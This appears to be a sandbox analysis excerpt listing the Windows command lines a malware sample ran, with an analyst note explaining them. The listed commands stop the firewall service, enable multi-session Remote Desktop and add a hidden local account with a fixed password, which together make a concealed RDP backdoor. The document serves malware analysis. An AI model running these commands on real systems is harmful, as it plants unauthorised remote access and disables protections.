Техническая информация (Technical information — command lines observed during sandbox execution; `<SYSTEM32>` and `%TEMP%` are path placeholders, and the odd `Terminal" "Server` quoting is the logger's rendering of embedded spaces, not a typo in the original command).
Note for analysts: read together, the commands below stop the `sharedaccess` service (Windows Firewall / Internet Connection Sharing), mark `termsrv.dll` hidden/system/read-only and (re)point the TermService `ServiceDll` at it (presumably a patched copy — confirm by hashing the file), set `EnableConcurrentSessions` = 1 and `fDenyTSConnections` = 0 to turn on Remote Desktop with multiple simultaneous sessions, and add a local account `geust$` (password `000001`) that is hidden from the logon screen via `SpecialAccounts\UserList` = 0 — i.e. a concealed RDP backdoor. The `net1 localgroup %USERNAME%s geust$ /add` line is reproduced as observed; its group name is likely a mistake in the dropped `open.bat` and may simply fail.
- '<SYSTEM32>\attrib.exe' +H +S +R <SYSTEM32>\termsrv.dll
- '<SYSTEM32>\net.exe' stop sharedaccess
- '<SYSTEM32>\reg.exe' ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Licensing" "Core /v EnableConcurrentSessions /t REG_DWORD /d 00000001 /f
- '<SYSTEM32>\reg.exe' ADD HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters /v ServiceDll /t REG_EXPAND_SZ /d <SYSTEM32>\termsrv.dll /f
- '<SYSTEM32>\net1.exe' stop sharedaccess
- '<SYSTEM32>\net1.exe' start termservice
- '<SYSTEM32>\shutdown.exe' -a
- '<SYSTEM32>\net1.exe' start dcomlaunch
- '<SYSTEM32>\svchost.exe' -k DcomLaunch
- '<SYSTEM32>\find.exe' "TermService"
- '<SYSTEM32>\taskkill.exe' /pid 836 /f
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\open.bat" > NUL"
- '<SYSTEM32>\tasklist.exe' /svc
- '<SYSTEM32>\reg.exe' ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Winlogon /v KeepRASConnections /t REG_SZ /d 1 /f
- '<SYSTEM32>\net1.exe' localgroup %USERNAME%s geust$ /add
- '<SYSTEM32>\reg.exe' ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Winlogon\SpecialAccounts\UserList /v geust$ /t "REG_DWORD" /d "0x00000000" /f
- '<SYSTEM32>\reg.exe' ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
- '<SYSTEM32>\net1.exe' user geust$ 000001 /add
- <SYSTEM32>\svchost.exe
- %TEMP%\open.bat
- %TEMP%\open.bat
- ClassName: '(null)' WindowName: '(null)'